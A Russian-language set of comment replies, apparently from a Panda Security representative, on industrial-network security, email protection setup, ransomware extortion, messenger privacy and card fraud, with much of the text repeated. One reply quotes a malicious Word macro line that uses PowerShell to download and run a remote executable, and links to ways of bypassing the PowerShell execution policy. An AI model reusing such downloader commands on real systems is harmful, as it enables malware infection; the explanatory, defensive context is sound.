На самом деле, я думаю, есть некоторое недопонимание. Попытаюсь здесь сразу ответить на сказанное выше и ниже.
В данной статье в разделе «Технические характеристики» изначально было отмечено о том, что в силу развития технологий и самих потребностей предприятий развиваются новые системы на базе гибридных архитектур, которые представляют собой сочетание ИТ-сетей и ОТ-сетей. Т.е. есть точки соприкосновения, и эти точки — это компьютеры. Мы пишем о том, что сами системы контроля работы критических инфраструктур, конечно же, должны быть изолированы от Интернета и даже от общей внутренней сети, но существуют такие системы контроля SCADA, которые видны во внутренней сети (а в некоторых случаях, даже имеют доступ в Интернет). Т.е. сами они не принимают участие непосредственно в управлении ТП, но они могут использоваться как шлюз для получения конфиденциальной информации о той же АСУТП для планирования других атак.
Наше решение как раз и предназначено для того, чтобы защищая обычные компьютеры на основе новой модели безопасности максимально предотвратить и исключить их компрометацию. Т.е. защита этих самых точек соприкосновения.
Технологии не стоят на месте и они постоянно развиваются, конечно же, со своими плюсами и минусами. Есть определенные потребности во взаимодействии различных систем управления и мониторинга ТП. И зачастую для этого используются ИТ-ресурсы, даже тот же Интернет. Понятно, что гораздо проще все закрыть полностью и сделать обособленным, но это не всегда та схема, которая необходима для гибкого и оперативного управления. А потому здесь есть новые риски, и о них идет речь в статье.
Очень хочу видеть конкретное перечисление реальных АСУТП, где «обычные» ПК, управляющие технологическим процессом интегрированы во внутреннюю сеть, или ДАЖЕ имеют прямой выход в Интернет!
Очень хочу увидеть документы проектов таких систем, чтобы знать, кто тот безрукий и безголовый архитектор, который спроектировал подобные структуры
Вы это серьезно говорите? Неужели Вы действительно думаете, что Вам кто-то это когда-то предоставит: список АСУТП со схемами, характеристиками и другой конфиденциальной информацией? Вы бы тоже стали раздавать свои проекты направо-налево?
Те случаи атак (как и многие другие), которые описаны в данной статье, — это те случаи, о которых много говорили и есть определенная «публичность» этих событий. И даже в этом случае нет 100% подтверждений и доказательств (как и нет доказательств обратному, что этого не было или это было не из-за кибер-атак). А многие случаи остались «за кадром». Наши специалисты знают о многих таких случаях, но по понятным причинам (надеюсь, Вы понимаете их?) мы не можем говорить о них публично.
Данная статья — это попытка обратить внимание на то, что передовые критические инфраструктуры — не те, что были 20 лет назад, они интегрируются в определенное информационное пространство со всеми вытекающими отсюда новыми рисками и угрозами. Это реальность. Конечно, это надо делать профессионально и с многоуровневой системой безопасности. Жить «по-старинке» и что-то там ваять «на коленке» — это бесперспективно.
Про Газпром и Сибирский нефтепровод можно узнать здесь
(в базе данных инцидентов наберите Gazprom. Будет информация о данном инциденте с более подробной информацией).
решение в виде очередного «сферического коня в вакууме» для нужд ИБ систем АСУТП
По поводу «сферического коня в вакууме»… Это синоним теоретического построения или утверждения, недостижимого на практике.
Panda Adaptive Defense 360 эффективно работает на сотнях тысячах корпоративных устройств в различных компаниях (в т.ч. и с объектами критической инфраструктуры) во многих странах мира, включая Россию. В этом предложении акцент на фразе «эффективно работает». Т.е. как минимум уже достижимо на практике, что ставит под сомнение Вашу оценку продукту.
Проблема заключается в том, что ряд технологических процессов могут управляться с «обычных» компьютеров, тем более, если они интегрированы во внутреннюю сеть или даже имеют выход в Интернет в силу развития концепций по расширению взаимодействия между различными системами управления и т.д. Поэтому Panda Adaptive Defense 360 может обеспечить защиту таких компьютеров, чтобы оградить кибер-угрозы от воздействия на объекты критической инфраструктуры, когда через скомпрометированный компьютер кибер-преступники смогут осуществить ряд других операций, способных повлиять на работу таких объектов.
Естественно, мы не говорим о том, что антивирус нужно поставить везде. И, конечно, Вы правы, что помимо самих только решений ИБ, есть масса других мер, которые необходимо предпринимать. Причем в первую очередь необходимо говорить о соответствующих организационных мерах. Кстати, если Вы посмотрите наши другие статьи, то мы об этом пишем очень часто. Но сейчас мы оставили все это за скобками, т.к. в данной статье смотрим на данную проблему со стороны своей сферы — ИБ. Мы говорим о том, что проблема есть, она вполне реальна, и примеров уже достаточно. О многих из них мы не можем сказать в силу целого ряда причин, но мы знаем о них, т.к. работаем по всему миру.
1. До облака как-то поднимается VPN? AD выставлять наружу как-то не комильфо…
Чтобы Panda Email Protection и Ваш AD могли обмениваться информацией, Вам необходимо открыть порт 389 (LDAP) или 636 (LDAP через SSL) для следующих IP-адресов, принадлежащих дата-центрам Panda:
92.54.22.0/24
92.54.27.0/24
188.94.13.128/25
2. Решение само подтягивает новых и удаляет отключенных пользователей? Или надо работать руками?
В разделе Настройки — Синхронизация можно указать периодичность синхронизации (ежедневно или в какой-то конкретный день недели) и режим синхронизации (вручную или автоматически)
3. Можно всем новым сразу включать «базовую» защиту?
На этот вопрос я смогу ответить Вам позже (жду дополнительную информацию от разработчика).
Часть 2 статьи «Зачем и как переносить безопасность корпоративной электронной почты в облако» опубликована по ссылке .
Вторая часть статьи посвящена сугубо техническому вопросу «как»: здесь мы покажем основные шаги по предварительной настройке SaaS-решения безопасности электронной почты на примере Panda Email Protection. Осуществив предварительную настройку, уже можно будет смело переключать mx-записи домена и наслаждаться «чистой» почтой.
1. Я так и не понял есть ли возможность защитить только часть адресов домена? А остальное пусть идет транзитом ко мне на почтовый сервер.
Да, можно, но это будет выглядеть таким образом:
1. Весь почтовый трафик домена все равно будет перенаправляться в облако Panda Email Protection
2. В консоли Panda Email Protection необходимо настроить все почтовые ящики домена, чтобы входящие письма не отсекались
3. Те ящики, которые не требуется защищать, — они настраиваются как пользователи с базовой фильтрацией. В этом случае лицензии продукта на них не тратятся и к ним не применяются модули защиты, для них не создается карантин и пр.
2. Может ли владелец защищаемого ящика зайти к вам в облако и индивидуально настроить параметры. например порог по которому отсеивать спам.
Да, каждый пользователь почтового ящика имеет возможность подключиться к своей пользовательской консоли управления.
В ней он может работать с сообщениями (включая доступ к спамовому карантину, но без доступа к вирусному карантину, куда имеет доступ только администратор), настройками фильтрации, опциями персонализации и другими общими параметрами.
Например, в настройках фильтрации пользователь может управлять белым и черным списками, списками отправителей, которые ожидают подтверждения, режимом фильтрации, движком правил.
Самый лучший вариант — это попробовать решение и посмотреть, какие имеются настройки и опции, насколько они гибки и достаточны для Вашей организации.
Концепция продукта Panda Email Protection учитывает особенности национального законодательства многих стран мира, когда необходимо размещать дата-центр на территории страны. Поэтому наш продукт развивается в соответствии с этими требованиями.
Кроме того, концепция продукта подразумевает «частное облако». В этом случае для крупных и очень крупных компаний мы можем всю инфраструктуру Panda Email Protection разместить в дата-центрах этих компаний, в результате чего наше решение становится «внутренним» решением компании. Имеется успешный опыт.
Локализация продукта осуществлялась за рубежом самостоятельно производителем.
Каким способом это производилось — у нас в российском офисе такой информации нет.
Но мы планируем обсудить с штаб-квартирой корректировку переводов, чтобы исправить ряд ошибок в переводе и сделать интерфейс продукта более качественным.
2. Пользователь включает контент в MS Word (чтобы макрос мог выполниться)
3. Запускается макрос, который выполняет PowerShell
По поводу:
Restricted: Does not load configuration files or run scripts. «Restricted» is the default execution policy
В данном случае PowerShell не загружает конфигурационные файлы и не выполняет скрипты (это слово “скрипты” относятся к скриптам PowerShell, как правило, с расширением .ps1). Он всего лишь скачивает файл и запускает его. Он выполняет PowerShell из командной строки. Если Вы отроете командную строку на Ваш ПК и наберете это:
то Вы увидите, как файл скачается и сохранится в виде файла User.jpg в Вашей папке %TMP%. При этом не важно, стоит ли какое-то ограничение в PowerShell. Эта опция “Restricted” сделана не по соображениям безопасности, а во избежание непреднамеренных ошибок. Существует довольно много способов, как при необходимости можно обойти это ограничение (Вы можете посмотреть эту статью: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/).
А каким образом макрос меняет на компе политику выполнения скриптов?
Он не меняет ее, но он обманным путем заставляет пользователя это сделать. Как видно на картинке в статье, вордовский документ говорит, что пользователь должен включить контент.
Контролирует ли хоть какой-то антивирус состояние этой политики?
Насколько нам известно, нет. Microsoft начал делать это, блокируя все макросы, поступающие извне (например, когда документ приходит по электронной почте). Проблема с Powershell заключается в том, что он широко используется на вполне законных основаниях, поэтому его нельзя блокировать в целом. Впрочем, наши системы позволяют осуществлять мониторинг всего, что происходит на ПК, включая Powershell. В этом случае нам удалось проактивно блокировать данную атаку, хоть злоумышленники и пытались использовать Powershell для выполнения вредоносной программы
Двойная галочка обозначает, что ваше сообщение прочитано пользователем. В данном случае может считаться нарушением конфиденциальности.
В этом и противоречие:
С одной стороны пользователь знает, что произошло с его личным сообщением, а с другой стороны нарушает конфиденциальность другого (получателя).
Со 100% достоверностью известно (согласно данным отчета):
Сервис собирает, ведет учет и хранит конфиденциальную информацию о:
1. пользователе и его разговорах;
2. получателях сообщений;
3. длительности звонков
Все указанное верно.
Хотя, возможно, сервис создавался именно для сбора информации о пользователях и дальнейшего ее использования спецслужбами (как вариант).
Основной вопрос: почему разработчики не заявили о сборе и хранении этих данных. Хотя знали, что во всех развитых странах действуют законы об использовании персональных данных (+конфиденциальной информации)…
В данном случае, под пользователями понимаются — корпоративные пользователи (компании-основная цель криптовымогателей). Открытой статистики нет, т.к. подобные вещи корпоративные клиенты стараются не разглашать.
как троян (не заказной, а «общего назначения») среди гигабайт информации на компьютере определял конфиденциальные файлы и пересылал их куда не надо?
Определять конфиденциальность файлов не нужно. Как правило, если требования шантажистов не выполнены, в открытый доступ размещают все файлы пострадавшей компании.
Бэкапы помогают только отчасти.
Как правило, даже если сделан бэкап и пользователь не заплатил выкуп, его начинают шантажировать публикацией конфиденциальной информации.
В данном случае получается выход один: заплатить шантажистам. Но у пользователя также нет и не будет гарантии, что его данные после оплаты будут расшифрованы и не будут использоваться в дальнейшем преступниками…
Вывод: на входе необходимо установить дополнительную защиту от неизвестных и сложных угроз.
Подробные ответы на данные вопросы опубликовал участник группы Хабрахабр ВК — Владислав Турман. Чтобы не повторяться, публикую ниже цитаты:
1) Карту своровали, наклеили на нее чип, который на любой пин-код отвечает, что он верный
2) Засунули эту карту в банкомат
3) ввели рандомный пин-код и фейковый чип ответил, что код верный
5) сняли бабосов, при этом
атака-по-середине подразумевает перехват информации между настоящим чипом и банкоматом и подмена нужной информации. В данном случае меняется лишь ответ настоящего чипа на запрос о проверке пин-кода. Банкомат спрашивает настоящий чип: «верный ли пинкод ввел пользоватеь», а фейковы чип отвечает вместо настоящего «да». При этом все остальные операции делает настоящий чип. на них поддельный не влияет. Это если весь процесс упростить) На самом деле я думаю там все в разы сложнее, но это уже на пальцах не объяснить
Примеры применения на практике раскрыты на форумах часто летающих пасссажиров, в т.ч. российских авиакомпаний.
Например, накопил пассажир бонусов на своей карте 200к и запланировал на них приобрести отпускные авиабилеты для себя и семьи. А у него списывают всю сумму с карты за месяц до этого. Когда обращается в авиакомпанию, оказывается, что его бонусами были оплачены и уже использованы авиабилеты какого-то гражданина (по правилам некоторых программ свои бонусы можно передавать). Имя гражданина в авиакомпании не сообщают (персональные данные) и расследование часто летающего пассажира заходит в тупик.
В данной статье в разделе «Технические характеристики» изначально было отмечено о том, что в силу развития технологий и самих потребностей предприятий развиваются новые системы на базе гибридных архитектур, которые представляют собой сочетание ИТ-сетей и ОТ-сетей. Т.е. есть точки соприкосновения, и эти точки — это компьютеры. Мы пишем о том, что сами системы контроля работы критических инфраструктур, конечно же, должны быть изолированы от Интернета и даже от общей внутренней сети, но существуют такие системы контроля SCADA, которые видны во внутренней сети (а в некоторых случаях, даже имеют доступ в Интернет). Т.е. сами они не принимают участие непосредственно в управлении ТП, но они могут использоваться как шлюз для получения конфиденциальной информации о той же АСУТП для планирования других атак.
Наше решение как раз и предназначено для того, чтобы защищая обычные компьютеры на основе новой модели безопасности максимально предотвратить и исключить их компрометацию. Т.е. защита этих самых точек соприкосновения.
Технологии не стоят на месте и они постоянно развиваются, конечно же, со своими плюсами и минусами. Есть определенные потребности во взаимодействии различных систем управления и мониторинга ТП. И зачастую для этого используются ИТ-ресурсы, даже тот же Интернет. Понятно, что гораздо проще все закрыть полностью и сделать обособленным, но это не всегда та схема, которая необходима для гибкого и оперативного управления. А потому здесь есть новые риски, и о них идет речь в статье.
Вы это серьезно говорите? Неужели Вы действительно думаете, что Вам кто-то это когда-то предоставит: список АСУТП со схемами, характеристиками и другой конфиденциальной информацией? Вы бы тоже стали раздавать свои проекты направо-налево?
Те случаи атак (как и многие другие), которые описаны в данной статье, — это те случаи, о которых много говорили и есть определенная «публичность» этих событий. И даже в этом случае нет 100% подтверждений и доказательств (как и нет доказательств обратному, что этого не было или это было не из-за кибер-атак). А многие случаи остались «за кадром». Наши специалисты знают о многих таких случаях, но по понятным причинам (надеюсь, Вы понимаете их?) мы не можем говорить о них публично.
Данная статья — это попытка обратить внимание на то, что передовые критические инфраструктуры — не те, что были 20 лет назад, они интегрируются в определенное информационное пространство со всеми вытекающими отсюда новыми рисками и угрозами. Это реальность. Конечно, это надо делать профессионально и с многоуровневой системой безопасности. Жить «по-старинке» и что-то там ваять «на коленке» — это бесперспективно.
(в базе данных инцидентов наберите Gazprom. Будет информация о данном инциденте с более подробной информацией).
И еще подробности
По поводу «сферического коня в вакууме»… Это синоним теоретического построения или утверждения, недостижимого на практике.
Panda Adaptive Defense 360 эффективно работает на сотнях тысячах корпоративных устройств в различных компаниях (в т.ч. и с объектами критической инфраструктуры) во многих странах мира, включая Россию. В этом предложении акцент на фразе «эффективно работает». Т.е. как минимум уже достижимо на практике, что ставит под сомнение Вашу оценку продукту.
Естественно, мы не говорим о том, что антивирус нужно поставить везде. И, конечно, Вы правы, что помимо самих только решений ИБ, есть масса других мер, которые необходимо предпринимать. Причем в первую очередь необходимо говорить о соответствующих организационных мерах. Кстати, если Вы посмотрите наши другие статьи, то мы об этом пишем очень часто. Но сейчас мы оставили все это за скобками, т.к. в данной статье смотрим на данную проблему со стороны своей сферы — ИБ. Мы говорим о том, что проблема есть, она вполне реальна, и примеров уже достаточно. О многих из них мы не можем сказать в силу целого ряда причин, но мы знаем о них, т.к. работаем по всему миру.
Чтобы Panda Email Protection и Ваш AD могли обмениваться информацией, Вам необходимо открыть порт 389 (LDAP) или 636 (LDAP через SSL) для следующих IP-адресов, принадлежащих дата-центрам Panda:
92.54.22.0/24
92.54.27.0/24
188.94.13.128/25
В разделе Настройки — Синхронизация можно указать периодичность синхронизации (ежедневно или в какой-то конкретный день недели) и режим синхронизации (вручную или автоматически)
На этот вопрос я смогу ответить Вам позже (жду дополнительную информацию от разработчика).
Вторая часть статьи посвящена сугубо техническому вопросу «как»: здесь мы покажем основные шаги по предварительной настройке SaaS-решения безопасности электронной почты на примере Panda Email Protection. Осуществив предварительную настройку, уже можно будет смело переключать mx-записи домена и наслаждаться «чистой» почтой.
Да, можно, но это будет выглядеть таким образом:
1. Весь почтовый трафик домена все равно будет перенаправляться в облако Panda Email Protection
2. В консоли Panda Email Protection необходимо настроить все почтовые ящики домена, чтобы входящие письма не отсекались
3. Те ящики, которые не требуется защищать, — они настраиваются как пользователи с базовой фильтрацией. В этом случае лицензии продукта на них не тратятся и к ним не применяются модули защиты, для них не создается карантин и пр.
Да, каждый пользователь почтового ящика имеет возможность подключиться к своей пользовательской консоли управления.
В ней он может работать с сообщениями (включая доступ к спамовому карантину, но без доступа к вирусному карантину, куда имеет доступ только администратор), настройками фильтрации, опциями персонализации и другими общими параметрами.
Например, в настройках фильтрации пользователь может управлять белым и черным списками, списками отправителей, которые ожидают подтверждения, режимом фильтрации, движком правил.
Самый лучший вариант — это попробовать решение и посмотреть, какие имеются настройки и опции, насколько они гибки и достаточны для Вашей организации.
Кроме того, концепция продукта подразумевает «частное облако». В этом случае для крупных и очень крупных компаний мы можем всю инфраструктуру Panda Email Protection разместить в дата-центрах этих компаний, в результате чего наше решение становится «внутренним» решением компании. Имеется успешный опыт.
Каким способом это производилось — у нас в российском офисе такой информации нет.
Но мы планируем обсудить с штаб-квартирой корректировку переводов, чтобы исправить ряд ошибок в переводе и сделать интерфейс продукта более качественным.
1. Пользователь открывает вордовский документ
2. Пользователь включает контент в MS Word (чтобы макрос мог выполниться)
3. Запускается макрос, который выполняет PowerShell
По поводу:
Restricted: Does not load configuration files or run scripts. «Restricted» is the default execution policy
В данном случае PowerShell не загружает конфигурационные файлы и не выполняет скрипты (это слово “скрипты” относятся к скриптам PowerShell, как правило, с расширением .ps1). Он всего лишь скачивает файл и запускает его. Он выполняет PowerShell из командной строки. Если Вы отроете командную строку на Ваш ПК и наберете это:
PowerShell (New-Object System.Net.WebClient).DownloadFile(' http://www.pandasecurity.com/mediacenter/src/uploads/2016/11/iStock_90393397_MEDIUM.jpg','%TMP%\User.jpg')
то Вы увидите, как файл скачается и сохранится в виде файла User.jpg в Вашей папке %TMP%. При этом не важно, стоит ли какое-то ограничение в PowerShell. Эта опция “Restricted” сделана не по соображениям безопасности, а во избежание непреднамеренных ошибок. Существует довольно много способов, как при необходимости можно обойти это ограничение (Вы можете посмотреть эту статью: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/).
Shell «cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://futuras.com/img/dododocdoc.exe','%TMP%\sweezy.exe');» + «Start-Proocess '%TMP%\sweezy.exe';», 0
Он не меняет ее, но он обманным путем заставляет пользователя это сделать. Как видно на картинке в статье, вордовский документ говорит, что пользователь должен включить контент.
Насколько нам известно, нет. Microsoft начал делать это, блокируя все макросы, поступающие извне (например, когда документ приходит по электронной почте). Проблема с Powershell заключается в том, что он широко используется на вполне законных основаниях, поэтому его нельзя блокировать в целом. Впрочем, наши системы позволяют осуществлять мониторинг всего, что происходит на ПК, включая Powershell. В этом случае нам удалось проактивно блокировать данную атаку, хоть злоумышленники и пытались использовать Powershell для выполнения вредоносной программы
В этом и противоречие:
С одной стороны пользователь знает, что произошло с его личным сообщением, а с другой стороны нарушает конфиденциальность другого (получателя).
Сервис собирает, ведет учет и хранит конфиденциальную информацию о:
1. пользователе и его разговорах;
2. получателях сообщений;
3. длительности звонков
Хотя, возможно, сервис создавался именно для сбора информации о пользователях и дальнейшего ее использования спецслужбами (как вариант).
Основной вопрос: почему разработчики не заявили о сборе и хранении этих данных. Хотя знали, что во всех развитых странах действуют законы об использовании персональных данных (+конфиденциальной информации)…
В данном случае, под пользователями понимаются — корпоративные пользователи (компании-основная цель криптовымогателей). Открытой статистики нет, т.к. подобные вещи корпоративные клиенты стараются не разглашать.
Определять конфиденциальность файлов не нужно. Как правило, если требования шантажистов не выполнены, в открытый доступ размещают все файлы пострадавшей компании.
Как правило, даже если сделан бэкап и пользователь не заплатил выкуп, его начинают шантажировать публикацией конфиденциальной информации.
В данном случае получается выход один: заплатить шантажистам. Но у пользователя также нет и не будет гарантии, что его данные после оплаты будут расшифрованы и не будут использоваться в дальнейшем преступниками…
Вывод: на входе необходимо установить дополнительную защиту от неизвестных и сложных угроз.
Например, накопил пассажир бонусов на своей карте 200к и запланировал на них приобрести отпускные авиабилеты для себя и семьи. А у него списывают всю сумму с карты за месяц до этого. Когда обращается в авиакомпанию, оказывается, что его бонусами были оплачены и уже использованы авиабилеты какого-то гражданина (по правилам некоторых программ свои бонусы можно передавать). Имя гражданина в авиакомпании не сообщают (персональные данные) и расследование часто летающего пассажира заходит в тупик.